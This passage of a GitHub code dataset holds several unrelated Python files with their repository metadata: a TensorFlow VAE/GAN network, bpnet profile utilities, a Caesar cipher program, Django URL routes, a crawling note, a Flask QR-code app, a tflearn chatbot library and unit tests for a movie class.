convrelu2(name='conv3', inputs=conv2, filters=256, kernel_size=3, stride=2,activation=myLeakyRelu)\n\n if gan_enabled == True:\n conv3 = tf.layers.dropout(conv3)\n\n # conv4 = convrelu2(name='conv4', inputs=conv3, filters=128, kernel_size=2, stride=2,activation=myLeakyRelu)\n\n # if gan_enabled == True:\n # conv4 = tf.layers.dropout(conv4)\n\n # conv5 = convrelu2(name='conv5', inputs=conv4, filters=256, kernel_size=2, stride=2,activation=myLeakyRelu)\n\n # if gan_enabled == True:\n # conv5 = tf.layers.dropout(conv5)\n\n # conv6 = convrelu2(name='conv6', inputs=conv5, filters=256, kernel_size=2, stride=2,activation=myLeakyRelu)\n\n # if gan_enabled == True:\n # conv6 = tf.layers.dropout(conv6)\n\n # print(conv6)\n\n dense_slice_shape = conv3.get_shape().as_list()\n\n # dense_slice_shape[-1] = 96\n\n # units = 1\n # for i in range(1,len(dense_slice_shape)):\n # units *= dense_slice_shape[i]\n\n # dense5 = tf.layers.dense(\n # tf.contrib.layers.flatten(tf.slice(conv3, [0,0,0,0], dense_slice_shape)),\n # units=units,\n # activation=None,\n # name='dense5'\n # )\n print(conv3)\n dense5 = tf.contrib.layers.flatten(conv3)\n print(dense5)\n z = 2048\n\n\n # mean latent vector\n z_mu = tf.layers.dense(dense5,units=z)\n\n # variance latent vector\n z_sigma = tf.layers.dense(dense5,units=z)\n\n # normal distribution \n eps = tf.random_normal(shape=tf.shape(z_sigma),mean=0, stddev=1, dtype=tf.float32)\n\n # adding up mean, variance with fixed normal distribution\n z_latent = z_mu + (z_sigma * eps)\n\n full_units_layer = tf.contrib.layers.fully_connected(z_latent,dense_slice_shape[1]*dense_slice_shape[2]*dense_slice_shape[3])\n\n # reshape [4,100] to [4,1,1,100] to pass it to the conv_transpose\n reshaped_layer = tf.reshape(full_units_layer,[full_units_layer.get_shape().as_list()[0],8,8,256])\n\n w_init = tf.truncated_normal_initializer(stddev=0.02)\n b_init = tf.constant_initializer(0.0)\n\n\n # 1rd hidden layer\n deconv1 = tf.layers.conv2d_transpose(reshaped_layer, 256, [5, 5], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # lrelu1 = myLeakyRelu(tf.layers.batch_normalization(deconv1, training=True))\n if gan_enabled == True:\n deconv1 = tf.layers.dropout(deconv1)\n\n lrelu1 = myLeakyRelu(deconv1)\n\n # 2nd hidden layer\n deconv2 = tf.layers.conv2d_transpose(lrelu1, 128, [5, 5], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # lrelu2 = myLeakyRelu(tf.layers.batch_normalization(deconv2, training=True))\n if gan_enabled == True:\n deconv2 = tf.layers.dropout(deconv2)\n \n lrelu2 = myLeakyRelu(deconv2)\n\n # 3rd hidden layer\n deconv3 = tf.layers.conv2d_transpose(lrelu2, 32, [5, 5], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # lrelu3 = myLeakyRelu(tf.layers.batch_normalization(deconv3, training=True))\n if gan_enabled == True:\n deconv3 = tf.layers.dropout(deconv3)\n \n lrelu3 = myLeakyRelu(deconv3)\n\n # # 4rd hidden layer\n # deconv4 = tf.layers.conv2d_transpose(lrelu3, 128, [3, 3], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # # lrelu4 = myLeakyRelu(tf.layers.batch_normalization(deconv4, training=True))\n # if gan_enabled == True:\n # deconv4 = tf.layers.dropout(deconv4)\n \n # lrelu4 = myLeakyRelu(deconv4)\n\n # # 5rd hidden layer\n # deconv5 = tf.layers.conv2d_transpose(lrelu4, 128, [3, 3], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # # lrelu5 = myLeakyRelu(tf.layers.batch_normalization(deconv5, training=True))\n # if gan_enabled == True:\n # deconv5 = tf.layers.dropout(deconv5)\n \n # lrelu5 = myLeakyRelu(deconv5)\n\n # deconv6 = tf.layers.conv2d_transpose(lrelu5, 64, [3, 3], strides=(2, 2), padding='same', kernel_initializer=w_init, bias_initializer=b_init)\n # # lrelu6 = myLeakyRelu(tf.layers.batch_normalization(deconv6, training=True))\n # if gan_enabled == True:\n # deconv6 = tf.layers.dropout(deconv6)\n \n # lrelu6 = myLeakyRelu(deconv6)\n # lrelu6 = tf.nn.sigmoid(deconv6)\n\n prediction = predict_final_image(lrelu3)\n print(prediction)\n\n return prediction, z_mu, z_sigma, z_latent\n\n\n\ndef discriminator(input, is_train=True, reuse=False):\n with tf.variable_scope('discriminator') as scope:\n if reuse:\n scope.reuse_variables()\n\n conv0 = convrelu2(name='conv0', inputs=input, filters=32, kernel_size=5, stride=2,activation=None)\n # conv0 = tf.layers.batch_normalization(conv0,training=is_train)\n conv0 =myLeakyRelu(conv0)\n\n conv1 = convrelu2(name='conv1', inputs=conv0, filters=64, kernel_size=3, stride=2,activation=None)\n # conv1 = tf.layers.batch_normalization(conv1,training=is_train)\n conv1 =myLeakyRelu(conv1)\n\n conv2 = convrelu2(name='conv2', inputs=conv1, filters=128, kernel_size=3, stride=2,activation=None)\n # conv2 = tf.layers.batch_normalization(conv2,training=is_train)\n conv2 =myLeakyRelu(conv2)\n\n conv3 = convrelu2(name='conv3', inputs=conv2, filters=256, kernel_size=3, stride=2,activation=None)\n # conv3 = tf.layers.batch_normalization(conv3,training=is_train)\n conv3 =myLeakyRelu(conv3)\n\n conv4 = convrelu2(name='conv4', inputs=conv3, filters=512, kernel_size=3, stride=2,activation=None)\n # conv4 = tf.layers.batch_normalization(conv4,training=is_train)\n conv4 =myLeakyRelu(conv4)\n\n dim = int(np.prod(conv4.get_shape()[1:]))\n fc1 = tf.reshape(conv4, shape=[-1, dim], name='fc1')\n \n \n w2 = tf.get_variable('w2', shape=[fc1.shape[-1], 1], dtype=tf.float32,\n initializer=tf.truncated_normal_initializer(stddev=0.02))\n b2 = tf.get_variable('b2', shape=[1], dtype=tf.float32,\n initializer=tf.constant_initializer(0.0))\n\n # wgan just get rid of the sigmoid\n logits = tf.add(tf.matmul(fc1, w2), b2, name='logits')\n # dcgan\n acted_out = tf.nn.sigmoid(logits)\n\n # dcgan\n return acted_out, conv2 #, acted_out","repo_name":"mozi22/RainyDays","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":9619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15109457016","text":"import pandas as pd\nfrom bpnet.preproc import resize_interval\nfrom tqdm import tqdm\nimport numpy as np\nfrom collections import OrderedDict\n\nfrom bpnet.plot.profiles import extract_signal\nfrom bpnet.modisco.core import dfi2seqlets, resize_seqlets, resize_seqlets\nfrom bpnet.simulate import profile_sim_metrics\nfrom bpnet.stats import quantile_norm\n\n\ndef profile_split(profile, seqlets):\n \"\"\"Split the profile to counts and profile probabilities\n \"\"\"\n total_counts = profile.sum(axis=-1).sum(axis=-1)\n sort_idx = np.argsort(-total_counts)\n\n # probabilities\n p = profile[sort_idx] / profile[sort_idx].sum(axis=1, keepdims=True)\n\n # drop NA's\n notnan = ~np.any(np.any(np.isnan(p), axis=-1), axis=-1)\n total_counts = total_counts[sort_idx][notnan]\n p = p[notnan]\n\n seqlet_idx = np.array([s.seqname for s in seqlets])[notnan]\n return p, total_counts, seqlet_idx\n\n\ndef profile_features(seqlets, ref_seqlets, profile, profile_width=70):\n # tasks = list(profile)\n\n # resize\n seqlets = resize_seqlets(seqlets, profile_width, seqlen=profile.shape[1])\n seqlets_ref = resize_seqlets(ref_seqlets, profile_width, seqlen=profile.shape[1])\n\n # extract the profile\n seqlet_profile = extract_signal(profile, seqlets)\n seqlet_profile_ref = extract_signal(profile, seqlets_ref)\n\n # compute the average profile\n avg_profile = seqlet_profile_ref.mean(axis=0)\n\n metrics = pd.DataFrame([profile_sim_metrics(avg_profile, cp) for cp in seqlet_profile])\n metrics_ref = pd.DataFrame([profile_sim_metrics(avg_profile, cp) for cp in seqlet_profile_ref])\n\n assert len(metrics) == len(seqlets) # needs to be the same length\n return pd.DataFrame(OrderedDict([\n (\"profile_match\", metrics.simmetric_kl),\n (\"profile_match_p\", quantile_norm(metrics.simmetric_kl, metrics_ref.simmetric_kl)),\n (\"profile_counts\", metrics['counts']),\n (\"profile_counts_p\", quantile_norm(metrics['counts'], metrics_ref['counts'])),\n (\"profile_max\", metrics['max']),\n (\"profile_max_p\", quantile_norm(metrics['max'], metrics_ref['max'])),\n ]))\n\n\ndef annotate_profile(dfi, mr, profiles, profile_width=70, trim_frac=0.08):\n \"\"\"Append profile match columns to dfi\n \"\"\"\n dfi = dfi.copy()\n dfp_list = []\n for pattern in tqdm(dfi.pattern.unique()):\n for task in profiles:\n dfp = profile_features(dfi2seqlets(dfi[dfi.pattern == pattern]),\n ref_seqlets=mr._get_seqlets(pattern, trim_frac=trim_frac),\n profile=profiles[task],\n profile_width=profile_width)\n dfp.columns = [f'{task}/{c}' for c in dfp.columns] # prepend task\n dfp_list.append(dfp)\n return pd.concat(dfp_list + [dfi], axis=1)\n","repo_name":"kundajelab/bpnet","sub_path":"bpnet/modisco/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"54"} +{"seq_id":"36424971218","text":"print('Приветствую! Программа \"Шифр Цезаря\"')\n\n\ntext = input('Введите текст который необходимо преобразовать: ')\ndirection = input('Укажите направление (шифрование или дешифрование - ш/д): ')\nalph = input('Укажите язык вводимого собщения (английский/русский - а/р(кириллица)): ')\nstep = int(input('Укажите шаг сдвига (со сдвигом вправо): '))\n\nen_alph = ''.join([chr(i) for i in range(97, 123)])\nen_alph_cap = en_alph.upper()\nru_alph = ''.join([chr(i) for i in range(1072, 1104)])\nru_alph_cap = ru_alph.upper()\n\ndef cipher_en(step, text):\n cipher_txt = ''\n for i in range(len(text)):\n if text[i] in en_alph:\n ind = en_alph.find(text[i]) + step\n if ind > 25:\n ind -= 26\n cipher_txt += en_alph[ind]\n elif ind <= 25:\n cipher_txt += en_alph[ind]\n elif text[i] in en_alph_cap:\n ind = en_alph_cap.find(text[i]) + step\n if ind > 25:\n ind -= 26\n cipher_txt += en_alph_cap[ind]\n elif ind <= 25:\n cipher_txt += en_alph_cap[ind]\n else:\n cipher_txt += text[i]\n return cipher_txt \n\ndef cipher_ru(step, text):\n cipher_txt = ''\n for i in range(len(text)):\n if text[i] in ru_alph:\n ind = ru_alph.find(text[i]) + step\n if ind > 31:\n ind -= 32\n cipher_txt += ru_alph[ind]\n elif ind <= 31:\n cipher_txt += ru_alph[ind]\n elif text[i] in ru_alph_cap:\n ind = ru_alph_cap.find(text[i]) + step\n if ind > 31:\n ind -= 32\n cipher_txt += ru_alph_cap[ind]\n elif ind <= 31:\n cipher_txt += ru_alph_cap[ind]\n else:\n cipher_txt += text[i]\n return cipher_txt \n\ndef dciper_en(step, text):\n dcipher_txt = ''\n for i in range(len(text)):\n if text[i] in en_alph:\n ind = en_alph.find(text[i]) - step\n if ind < 0:\n ind += 26\n dcipher_txt += en_alph[ind]\n elif ind >= 0:\n dcipher_txt += en_alph[ind]\n elif text[i] in en_alph_cap:\n ind = en_alph_cap.find(text[i]) - step\n if ind < 0:\n ind += 26\n dcipher_txt += en_alph_cap[ind]\n elif ind >= 0:\n dcipher_txt += en_alph_cap[ind]\n else:\n dcipher_txt += text[i]\n return dcipher_txt \n\ndef dciper_ru(step, text):\n dcipher_txt = ''\n for i in range(len(text)):\n if text[i] in ru_alph:\n ind = ru_alph.find(text[i]) - step\n if ind < 0:\n ind += 32\n dcipher_txt += ru_alph[ind]\n elif ind >= 0:\n dcipher_txt += ru_alph[ind]\n elif text[i] in ru_alph_cap:\n ind = ru_alph_cap.find(text[i]) - step\n if ind < 0:\n ind += 32\n dcipher_txt += ru_alph_cap[ind]\n elif ind >= 0:\n dcipher_txt += ru_alph_cap[ind]\n else:\n dcipher_txt += text[i]\n return dcipher_txt \n\ndef output(alph, direction):\n if alph == 'а' and direction == 'ш':\n return cipher_en(step, text)\n elif alph == 'р' and direction == 'ш':\n return cipher_ru(step, text)\n elif alph == 'а' and direction == 'д':\n return dciper_en(step,text)\n elif alph == 'р' and direction == 'д':\n return dciper_ru(step,text)\n else:\n return 'Ошибка ввода!'\n\nprint(output(alph, direction))","repo_name":"jooorik/stepik-project","sub_path":"caesar's cipher.py","file_name":"caesar's cipher.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38003320655","text":"\n\nfrom django.urls import path\n\nfrom .views import (\n StatusAPIView,\n # StatusCreateAPIView,\n # StatusDetailAPIView,\n # StatusUpdateAPIView,\n # StatusDeleteAPIView\n)\n\nurlpatterns = [\n \n path('',StatusAPIView.as_view()),\n # path('/',StatusDetailAPIView.as_view()),\n \n]\n\n#/api/status\n#api/status/create\n#api/status/12/update\n#api/status/12/delete\n#api/status/12\n\n","repo_name":"SifatIbna/restapi-project","sub_path":"status/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"71898238881","text":"# Crawling: 인터넷에 있는 정보를 자동으로 다운로드\n# aka parsing, spidering\n\n# BeautifulSoup (HTML parser), Requests, 구름IDE(ide.goorm.io)\n# $python index.py\n\n# pip install bs4\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n\nwith urlopen('http:/en.wikipedia.org/wiki/Main_Page') as response:\n soup = BeautifulSoup(response, 'html.parser')\n for anchor in soup.find_all('a'):\n print(anchor.get('href','/'))\n\n# f12 개발자 화면, Beautifulsoup 공식문서\n# .select\n# soup.select(\"span.ah_k\") 를 선택하라는 뜻\n# .get_text()\n\nf = open(\"C:/doit/새파일.txt\", 'w')\nfor i in range(1, 11):\n f.write(i)\nf.close()\n\n# 이미지 주소: src\n\n# pip install google_images_download","repo_name":"biggymart/study","sub_path":"assignments/Beer_project/2_jocoding_selenium.py","file_name":"2_jocoding_selenium.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9605410294","text":"# encoding=utf-8\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import url_for\nfrom flask import redirect\nfrom flask import request\nimport qrc\napp = Flask(__name__)\n\n@app.route('/')#‘/'页面或路径\ndef index():\n return redirect(url_for('url'))\n\n@app.route('/url',methods=['GET','POST'])\ndef url():#默认请求方式为get\n #request中包含所有用户发起请求的信息\n if request.method == 'GET':\n return render_template('url.html')\n else:\n url = request.form['url']\n imgurl = qrc.url(url)\n return render_template('img.html',imgurl=imgurl)\n\n@app.route('/text',methods=['GET','POST'])\ndef text():\n if request.method == 'GET':\n return render_template('url.html')\n else:\n url = request.form['url']\n imgurl = qrc.url(url)\n return render_template('img.html',imgurl=imgurl)\nif __name__=='__main__':\n app.debug = True\n app.run()#app.run(debug=True)","repo_name":"xiaoloinzi/worksplace","sub_path":"GR1/python_1/webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6870081099","text":"\r\n# -*- coding: utf-8 -*-\r\n#\r\n# chatbot.py\r\n# \r\n# Copyright 2020 Dirgan \r\n# \r\n# This program is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n# \r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\r\n# MA 02110-1301, USA.\r\n# \r\n# \r\n\r\nprint(\"Initializing Chatbot Library...\")\r\n\r\nimport pip\r\n\r\ndef installModule(package):\r\n if hasattr(pip, 'main'):\r\n pip.main(['install', package])\r\n else:\r\n pip._internal.main(['install', package])\r\n\r\ntry:\r\n\timport nltk\r\nexcept: \r\n\tinstallModule(\"nltk\")\r\n\timport nltk\r\n\r\ntry:\r\n\timport tensorflow\r\nexcept: \r\n\tinstallModule(\"tensorflow\")\r\nfinally:\r\n\timport tensorflow\r\n\r\ntry:\r\n\timport tflearn\r\nexcept: \r\n\tinstallModule(\"tflearn\")\r\nfinally:\r\n\timport tflearn\r\n\r\ntry:\r\n\timport numpy\r\nexcept: \r\n\tinstallModule(\"numpy\")\r\nfinally:\r\n\timport numpy\r\n\r\nimport random\r\nimport json\r\nimport pickle\r\nimport signal\r\nimport os\t\r\n\r\nfrom nltk.stem.lancaster import LancasterStemmer\r\n\r\n###########\r\n## C ##\r\n###########\r\nclass ltoChatbot():\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef __init__(self, botName = \"ltoChatbot\", corpusFile = \"ltoChatbotCorpus.json\", specialization=\"Specialized topic\", neurons=10, iterations = 1000, levels = 2, forceTraining=False):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\t\t\r\n\t\tself.tensorflowTrainFiles=(\"checkpoint\",\"ltoChatbot.pdata\", \"ltoChatBot.tflearn.data-00000-of-00001\", \"ltoChatBot.tflearn.index\", \"ltoChatBot.tflearn.meta\")\r\n\t\t\r\n\t\tself._modelOnDisk = \"ltoChatBot.tflearn\"\r\n\t\tself._dataOnDisk = \"ltoChatbot.pdata\"\r\n\t\tself._conversationOnDisk = \"ltoChatbotConversationCorpus.json\"\r\n\t\tself._botName = botName\r\n\t\tself._specialization = specialization\r\n\t\t\r\n\t\tself._corpusFile = corpusFile\r\n\t\tself._corpusData = None\r\n\t\t\r\n\t\tself._model = None\r\n\t\t\r\n\t\tself._stemmer = LancasterStemmer()\r\n\r\n\t\tself._words = []\r\n\t\tself._labels = []\r\n\t\tself._dx = []\r\n\t\tself._dy = []\r\n\t\t\r\n\t\tnltk.download('punkt')\t\r\n\r\n\t\tself._notKnownResponses = [\"I'm not quite sure what you are asking for... could you repeat your question?\",\r\n\t\t\t\t\t\t\t\t\"Don't understand your question, rephrase your question please!\",\r\n\t\t\t\t\t\t\t\t\"I got lost, could you please repeat what you are looking for?\",\r\n\t\t\t\t\t\t\t\t\"I think I don´t get you question, please ask again\",\r\n\t\t\t\t\t\t\t\t\"I am a specialized bot for responding on an specific topic, please ask something about %s\"%self._specialization]\r\n\r\n\t\tself.setup()\r\n\t\t\r\n\t\tself.train(force=forceTraining, neurons=neurons, trainingIterations = iterations, levels = levels)\r\n\t\t\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef setup(self):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\r\n\t\ttry:\r\n\t\t\twith open(self._corpusFile) as file:\r\n\t\t\t\tself._corpusData = json.load(file)\r\n\t\texcept:\r\n\t\t\tprint(\"ERROR: no Corpus was found!\")\r\n\t\t\texit(1)\r\n\r\n\t\ttry:\r\n\t\t\twith open(self._conversationOnDisk) as file:\r\n\t\t\t\t_conversationalData = json.load(file)\r\n\t\t\t\r\n\t\t\tself._corpusData[\"topics\"].extend(_conversationalData[\"topics\"])\r\n\t\texcept Exception as err:\r\n\t\t\tprint(\"ERROR: no Conversation Corpus was found, so the bot won't be polite!\")\t\t\r\n\r\n\t\ttry:\r\n\t\t\twith open(self._dataOnDisk, \"rb\") as f:\r\n\t\t\t\tself._words, self._labels, self._training, self._output = pickle.load(f)\r\n\t\t\tprint(\"Found data preprocessed on disk!\")\r\n\t\texcept:\r\n\t\t\tfor topic in self._corpusData[\"topics\"]:\r\n\t\t\t\tfor pattern in topic[\"patterns\"]:\r\n\t\t\t\t\twordsTokenized = nltk.word_tokenize(pattern)\r\n\t\t\t\t\twordsLowerized = [i.lower() for i in wordsTokenized if i!=\"?\"]\r\n\t\t\t\t\tself._words.extend(wordsLowerized)\r\n\t\t\t\t\tself._dx.append(wordsLowerized)\r\n\t\t\t\t\tself._dy.append(topic[\"tag\"].lower())\r\n\r\n\t\t\t\tif topic[\"tag\"].lower() not in self._labels:\r\n\t\t\t\t\tself._labels.append(topic[\"tag\"].lower())\r\n\r\n\t\t\tself._words = [self._stemmer.stem(w) for w in self._words if w != \"?\"]\r\n\t\t\t\r\n\t\t\tself._words = sorted(list(set(self._words)))\r\n\t\t\tself._labels = sorted(self._labels)\r\n\r\n\t\t\tself._training = []\r\n\t\t\tself._output = []\r\n\r\n\t\t\t_outEmpty = [0 for _ in range(len(self._labels))]\r\n\r\n\t\t\tfor index, dx in enumerate(self._dx):\r\n\t\t\t\t_bagOfWords = []\r\n\r\n\t\t\t\twrds = [self._stemmer.stem(w.lower()) for w in dx]\r\n\r\n\t\t\t\tfor w in self._words:\r\n\t\t\t\t\tif w in wrds:\r\n\t\t\t\t\t\t_bagOfWords.append(1)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t_bagOfWords.append(0)\r\n\r\n\t\t\t\t_outputRow = _outEmpty[:]\r\n\t\t\t\t_outputRow[self._labels.index(self._dy[index])] = 1\r\n\r\n\t\t\t\tself._training.append(_bagOfWords)\r\n\t\t\t\tself._output.append(_outputRow)\r\n\r\n\r\n\t\t\tself._training = numpy.array(self._training)\r\n\t\t\tself._output = numpy.array(self._output)\r\n\r\n\t\t\twith open(self._dataOnDisk, \"wb\") as f:\r\n\t\t\t\tpickle.dump((self._words, self._labels, self._training, self._output), f)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef trainingDataExists(self):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\t\texists = True\r\n\t\tfor tf in self.tensorflowTrainFiles:\r\n\t\t\ttry:\r\n\t\t\t\tif not os.path.exists(tf):\r\n\t\t\t\t\texists = False\r\n\t\t\t\t\tbreak\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint(e)\r\n\t\t\t\t\r\n\t\treturn exists\r\n\t\t\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef removeTrainingData(self):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\t\tfor tf in self.tensorflowTrainFiles:\r\n\t\t\ttry:\r\n\t\t\t\tos.remove(tf)\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tprint(e)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef train(self, force = False, levels = 2, neurons = 10, trainingIterations = 1000, verbose = True):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\t\tif force:\r\n\t\t\tself.removeTrainingData()\r\n\t\telse:\t\r\n\t\t\tif not self.trainingDataExists():\r\n\t\t\t\tforce=True\r\n\r\n\t\ttensorflow.reset_default_graph()\r\n\r\n\t\t_net = tflearn.input_data(shape=[None, len(self._training[0])])\r\n\r\n\t\tfor i in range(levels): \r\n\t\t\t_net = tflearn.fully_connected(_net, neurons)\r\n\r\n\t\t_net = tflearn.fully_connected(_net, len(self._output[0]), activation=\"softmax\")\r\n\t\t_net = tflearn.regression(_net)\r\n\r\n\t\tself._model = tflearn.DNN(_net)\r\n\t\t\r\n\t\tif force:\r\n\t\t\tprint(\"recreating the model!\")\r\n\t\t\ttry:\r\n\t\t\t\tself._model.fit(self._training, self._output, n_epoch=trainingIterations, batch_size=neurons, show_metric=True)\r\n\t\t\t\tprint(\"Saving model on Disk!\")\r\n\t\t\t\tself._model.save(self._modelOnDisk)\t\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Something wrong has happended training your model!\")\r\n\t\telse:\r\n\t\t\ttry:\r\n\t\t\t\tself._model.load(self._modelOnDisk)\t\r\n\t\t\t\tprint(\"found model on disk!\")\r\n\t\t\texcept:\t\r\n\t\t\t\tprint(\"recreating the model!\")\r\n\t\t\t\ttry:\r\n\t\t\t\t\tself._model.fit(self._training, self._output, n_epoch=trainingIterations, batch_size=neurons, show_metric=True)\r\n\t\t\t\t\tprint(\"Saving model on Disk!\")\r\n\t\t\t\t\tself._model.save(self._modelOnDisk)\t\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint(\"Something wrong has happended training your model!\")\r\n\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef retrain(self, levels = 2, neurons = 10, iterations = 1000, verbose = True):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\t\tself.train(force=True, levels=levels, neurons=neurons, trainingIterations=iterations)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef askBot(self, question = \"Who are you?\", accuracy = .7):\r\n# ~ #-------------------------------------------------------------------------------------------------------------------\r\n\t\t_inWords = question.lower()\r\n\t\t_bagOfInWords = [0 for _ in range(len(self._words))]\r\n\t\t_inWordsTokenized = nltk.word_tokenize(_inWords)\r\n\t\t_inWordsTokenized = [self._stemmer.stem(w) for w in _inWordsTokenized]\r\n\t\t\r\n\t\tfor word in _inWordsTokenized:\r\n\t\t\tfor i,w in enumerate(self._words):\r\n\t\t\t\tif w == word: \r\n\t\t\t\t\t_bagOfInWords[i] = 1\r\n\t\t\r\n\t\t_result =self._model.predict([numpy.array(_bagOfInWords)])\r\n\t\t\r\n\t\tif max(_result[0]) > accuracy:\r\n\t\t\t_resultIndex = numpy.argmax(_result)\r\n\t\t\t_tagPredicted = self._labels[_resultIndex].lower()\r\n\t\t\t\r\n\t\t\tfor _tag in self._corpusData[\"topics\"]:\r\n\t\t\t\tif _tag['tag'].lower() == _tagPredicted:\r\n\t\t\t\t\t_responses = _tag['responses']\t\t\t\r\n\r\n\r\n\t\t\tif _tagPredicted == \"content\":\r\n\t\t\t\t_resp = \" ,\".join([ tag[\"tag\"].lower() for tag in self._corpusData[\"topics\"] ])\r\n\t\t\telse:\r\n\t\t\t\t_resp = random.choice(_responses)\r\n\t\telse:\r\n\t\t\t_resp = random.choice(self._notKnownResponses)\r\n\t\t\t_tagPredicted = \"not Known Responses\"\r\n\t\r\n\t\treturn {\"tag\":_tagPredicted, \"answer\":_resp}\r\n\r\n\r\n#-------------------------------------------------------------------------------------------------------------------\r\ndef stopServerHandler(signum, frame):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tprint( 'Stopping Chatbot with Ctrl-C')\r\n\texit(0)\r\n\t\r\n############################################\r\n############################################\r\n############################################\r\nif __name__ == '__main__':\r\n\t\r\n\tsignal.signal(signal.SIGINT, stopServerHandler)\r\n\r\n\tchatBot = ltoChatbot(corpusFile=\"Ansible_Corpus.json\", forceTraining=False, levels=2, iterations = 700)\r\n\t\r\n\twhile True:\r\n\t\tresp = chatBot.askBot(input(\"Alejandro: \").lower(), accuracy=.8)\r\n\t\tprint()\r\n\t\tprint(\"BOT: \",resp[\"answer\"])\r\n\t\tprint()\r\n\t\tif (resp[\"tag\"] == \"goodbye\"): exit(0)\r\n\r\n","repo_name":"ltoRhelDemos/python-ansible-chatbot","sub_path":"chatbotLib.py","file_name":"chatbotLib.py","file_ext":"py","file_size_in_byte":10406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31749727140","text":"from project_movies.movie import Movie\nfrom unittest import TestCase, main\n\n\nclass TestMovie(TestCase):\n\n def setUp(self) -> None:\n self.movie = Movie('Matrix', 2000, 6.5)\n\n def test_initializing(self):\n self.assertEqual('Matrix', self.movie.name)\n self.assertEqual(2000, self.movie.year)\n self.assertEqual(6.5, self.movie.rating)\n self.assertEqual([], self.movie.actors)\n\n def test_name_raises_value_error_if_name_is_an_empty_string(self):\n with self.assertRaises(ValueError) as ve:\n self.movie.name = ''\n self.assertEqual(str(ve.exception), \"Name cannot be an empty string!\")\n\n def test_year_raises_value_error(self):\n with self.assertRaises(ValueError) as ve:\n self.movie.year = 1500\n self.assertEqual(str(ve.exception), 'Year is not valid!')\n\n def test_add_actor_adds_actor(self):\n self.movie.add_actor('Neo')\n self.assertEqual(['Neo'], self.movie.actors)\n self.assertEqual(len(self.movie.actors), 1)\n\n def test_add_actor_returns_message(self):\n self.movie.add_actor(\"Neo\")\n self.assertEqual(len(self.movie.actors), 1)\n result = self.movie.add_actor(\"Neo\")\n self.assertEqual(len(self.movie.actors), 1)\n self.assertEqual(str(result), 'Neo is already added in the list of actors!')\n\n def test_gt_if_self_rating_higher_than_other_rating(self):\n self.second_movie = Movie('John Wick', 2010, 4)\n result = self.movie > self.second_movie\n self.assertEqual(str(result), f'\"Matrix\" is better than \"John Wick\"')\n\n def test_gt_if_self_rating_lower_than_other_rating(self):\n self.second_movie = Movie('John Wick', 2010, 10)\n result = self.movie > self.second_movie\n self.assertEqual(str(result), f'\"John Wick\" is better than \"Matrix\"')\n\n def test_repr(self):\n self.movie.add_actor('Neo')\n self.movie.add_actor('Trinity')\n expected = 'Name: Matrix\\n' \\\n 'Year of Release: 2000\\n' \\\n 'Rating: 6.50\\n' \\\n 'Cast: Neo, Trinity'\n\n self.assertEqual(expected, repr(self.movie))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KstoyM/python_OOP","sub_path":"testing/project_movies/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73610869282","text":"import os\nimport sys\n\nimport hug\n\nimport jinja2\nfrom jinja2 import Markup\n\n_HERE=os.path.split(__file__)[0]\n\ntemplates=jinja2.Environment(loader=jinja2.FileSystemLoader(os.path.join(_HERE,\"templates\")))\n\n\n\n@hug.static(\"/static\")\ndef static_dirs() :\n return 